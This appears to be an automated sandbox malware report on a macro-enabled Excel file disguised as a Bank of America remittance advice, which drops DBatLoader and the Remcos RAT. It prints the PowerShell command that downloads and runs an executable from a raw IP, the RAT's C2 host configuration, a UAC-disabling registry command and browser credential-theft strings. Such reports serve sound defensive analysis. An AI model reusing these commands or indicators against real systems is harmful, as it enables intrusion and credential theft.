Play interactive tour

Edit tour

Windows Analysis Report BoFA_Remittance Advice_21219.xlsm

Overview

General Information

Sample Name:	BoFA_Remittance Advice_21219.xlsm
Analysis ID:	487588
MD5:	54c351236ba33c74a10f1fcccf81b4fd
SHA1:	fa734041869ffc2e811aaaf6ee5e9d26f196e53f
SHA256:	61005cab010bde9798cb5c7ee05497c08ba71d638644f05a1b5e58c8eac67ca1
Tags:	xlsm
Infos:
Most interesting Screenshot:

Detection

Remcos DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected DBatLoader

Detected Remcos RAT

Sigma detected: Suspicious Script Execution From Temp Folder

Contains functionality to steal Firefox passwords or cookies

Injects a PE file into a foreign processes

Powershell drops PE file

Sigma detected: Execution from Suspicious Folder

Contains functionality to inject code into remote processes

Sigma detected: WScript or CScript Dropper

Creates a thread in another existing process (thread injection)

Document exploit detected (process start blacklist hit)

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Delayed program exit found

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected WebBrowserPassView password recovery tool

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Tries to steal Instant Messenger accounts or passwords

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Uses reg.exe to modify the Windows registry

Contains functionality to retrieve information about pressed keystrokes

Drops PE files to the user directory

Excel documents contains an embedded macro which executes code when the document is opened

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to read the clipboard data

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Yara detected Xls With Macro 4.0

Detected TCP or UDP traffic on non-standard ports

Contains capabilities to detect virtual machines

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Potential document exploit detected (performs HTTP gets)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 6344 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

powershell.exe (PID: 6584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

explorer.exe (PID: 6388 cmdline: 'C:\Windows\system32\explorer.exe' C:\Users\Public\filesvr.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 2348 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)

filesvr.exe (PID: 6536 cmdline: 'C:\Users\Public\filesvr.exe' MD5: CF98D2D4D4555323842C8371DB09347E)

logagent.exe (PID: 5572 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)

logagent.exe (PID: 5016 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\dwhqbdxsbnvloizrbdml' MD5: E2036AC444AB4AD91EECC1A80FF7212F)

logagent.exe (PID: 5008 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\nyuabviupwnyypwvkgznugfs' MD5: E2036AC444AB4AD91EECC1A80FF7212F)

logagent.exe (PID: 6672 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\psztcntndefdbvkhbrmoflajdfh' MD5: E2036AC444AB4AD91EECC1A80FF7212F)

wscript.exe (PID: 1648 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 3584 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3464 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4968 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6384 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)

conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Srakjle.exe (PID: 6172 cmdline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe' MD5: CF98D2D4D4555323842C8371DB09347E)

logagent.exe (PID: 3360 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)

Srakjle.exe (PID: 6656 cmdline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe' MD5: CF98D2D4D4555323842C8371DB09347E)

cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\eljkarS.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60f17:$str_a1: C:\Windows\System32\cmd.exe 0x60e93:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60e93:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x6049b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60af3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x600ef:$str_b2: Executing file: 0x6105b:$str_b3: GetDirectListeningPort 0x608b3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60adb:$str_b7: \update.vbs 0x6013f:$str_b9: Downloaded file: 0x6012b:$str_b10: Downloading file: 0x60113:$str_b12: Failed to upload file: 0x61023:$str_b13: StartForward 0x61043:$str_b14: StopForward 0x60a83:$str_b15: fso.DeleteFile " 0x60a17:$str_b16: On Error Resume Next 0x60ab3:$str_b17: fso.DeleteFolder " 0x60103:$str_b18: Uploaded file: 0x6017f:$str_b19: Unable to delete: 0x60a4b:$str_b20: while fso.FileExists(" 0x605d4:$str_c0: [Firefox StoredLogins not found]
00000027.00000002.512103234.0000000002493000.00000004.00000001.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000002C.00000002.509224017.0000000002748000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60f17:$str_a1: C:\Windows\System32\cmd.exe 0x60e93:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
Process Memory Space: powershell.exe PID: 6584	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x15a6c0:$sa2: -encodedCommand 0x15a6ec:$sa2: -encodedCommand 0x15add8:$sa2: -EncodedCommand 0x15b8f9:$sa2: -EncodedCommand 0x15b994:$sa2: -encodedCommand 0x290af:$sc1: -nop 0x293f2:$sc1: -nop 0x29653:$sc1: -nop 0x29866:$sc1: -nop 0x29b74:$sc1: -nop 0x16418e:$sc1: -nop 0x175a94:$sc1: -nop 0x1d2b99:$sc1: -nop 0x15abb3:$sc2: -NoProfile 0x15abf4:$sd2: -NonInteractive
Process Memory Space: logagent.exe PID: 5572	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: logagent.exe PID: 5016	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: logagent.exe PID: 3360	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.logagent.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.logagent.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
44.2.logagent.exe.10590000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
44.2.logagent.exe.10590000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x60317:$str_a1: C:\Windows\System32\cmd.exe 0x60293:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60293:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f89b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5fef3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f4ef:$str_b2: Executing file: 0x6045b:$str_b3: GetDirectListeningPort 0x5fcb3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5fedb:$str_b7: \update.vbs 0x5f53f:$str_b9: Downloaded file: 0x5f52b:$str_b10: Downloading file: 0x5f513:$str_b12: Failed to upload file: 0x60423:$str_b13: StartForward 0x60443:$str_b14: StopForward 0x5fe83:$str_b15: fso.DeleteFile " 0x5fe17:$str_b16: On Error Resume Next 0x5feb3:$str_b17: fso.DeleteFolder " 0x5f503:$str_b18: Uploaded file: 0x5f57f:$str_b19: Unable to delete: 0x5fe4b:$str_b20: while fso.FileExists(" 0x5f9d4:$str_c0: [Firefox StoredLogins not found]
24.2.logagent.exe.10591a73.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.logagent.exe.10591a73.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
44.2.logagent.exe.10591a73.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
44.2.logagent.exe.10591a73.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5d47c:$str_b2: Executing file: 0x5e3e8:$str_b3: GetDirectListeningPort 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5de68:$str_b7: \update.vbs 0x5d4cc:$str_b9: Downloaded file: 0x5d4b8:$str_b10: Downloading file: 0x5d4a0:$str_b12: Failed to upload file: 0x5e3b0:$str_b13: StartForward 0x5e3d0:$str_b14: StopForward 0x5de10:$str_b15: fso.DeleteFile " 0x5dda4:$str_b16: On Error Resume Next 0x5de40:$str_b17: fso.DeleteFolder " 0x5d490:$str_b18: Uploaded file: 0x5d50c:$str_b19: Unable to delete: 0x5ddd8:$str_b20: while fso.FileExists(" 0x5d961:$str_c0: [Firefox StoredLogins not found]
44.2.logagent.exe.250000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
44.2.logagent.exe.250000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
24.2.logagent.exe.10590000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.logagent.exe.10590000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x60317:$str_a1: C:\Windows\System32\cmd.exe 0x60293:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60293:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f89b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5fef3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f4ef:$str_b2: Executing file: 0x6045b:$str_b3: GetDirectListeningPort 0x5fcb3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5fedb:$str_b7: \update.vbs 0x5f53f:$str_b9: Downloaded file: 0x5f52b:$str_b10: Downloading file: 0x5f513:$str_b12: Failed to upload file: 0x60423:$str_b13: StartForward 0x60443:$str_b14: StopForward 0x5fe83:$str_b15: fso.DeleteFile " 0x5fe17:$str_b16: On Error Resume Next 0x5feb3:$str_b17: fso.DeleteFolder " 0x5f503:$str_b18: Uploaded file: 0x5f57f:$str_b19: Unable to delete: 0x5fe4b:$str_b20: while fso.FileExists(" 0x5f9d4:$str_c0: [Firefox StoredLogins not found]
24.2.logagent.exe.10590000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.logagent.exe.10590000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60f17:$str_a1: C:\Windows\System32\cmd.exe 0x60e93:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60e93:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x6049b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60af3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x600ef:$str_b2: Executing file: 0x6105b:$str_b3: GetDirectListeningPort 0x608b3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60adb:$str_b7: \update.vbs 0x6013f:$str_b9: Downloaded file: 0x6012b:$str_b10: Downloading file: 0x60113:$str_b12: Failed to upload file: 0x61023:$str_b13: StartForward 0x61043:$str_b14: StopForward 0x60a83:$str_b15: fso.DeleteFile " 0x60a17:$str_b16: On Error Resume Next 0x60ab3:$str_b17: fso.DeleteFolder " 0x60103:$str_b18: Uploaded file: 0x6017f:$str_b19: Unable to delete: 0x60a4b:$str_b20: while fso.FileExists(" 0x605d4:$str_c0: [Firefox StoredLogins not found]
44.2.logagent.exe.10591a73.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
44.2.logagent.exe.10591a73.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
44.2.logagent.exe.10590000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
44.2.logagent.exe.10590000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60f17:$str_a1: C:\Windows\System32\cmd.exe 0x60e93:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60e93:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x6049b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60af3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x600ef:$str_b2: Executing file: 0x6105b:$str_b3: GetDirectListeningPort 0x608b3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60adb:$str_b7: \update.vbs 0x6013f:$str_b9: Downloaded file: 0x6012b:$str_b10: Downloading file: 0x60113:$str_b12: Failed to upload file: 0x61023:$str_b13: StartForward 0x61043:$str_b14: StopForward 0x60a83:$str_b15: fso.DeleteFile " 0x60a17:$str_b16: On Error Resume Next 0x60ab3:$str_b17: fso.DeleteFolder " 0x60103:$str_b18: Uploaded file: 0x6017f:$str_b19: Unable to delete: 0x60a4b:$str_b20: while fso.FileExists(" 0x605d4:$str_c0: [Firefox StoredLogins not found]
44.2.logagent.exe.250000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
44.2.logagent.exe.250000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
24.2.logagent.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.logagent.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
24.2.logagent.exe.10591a73.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
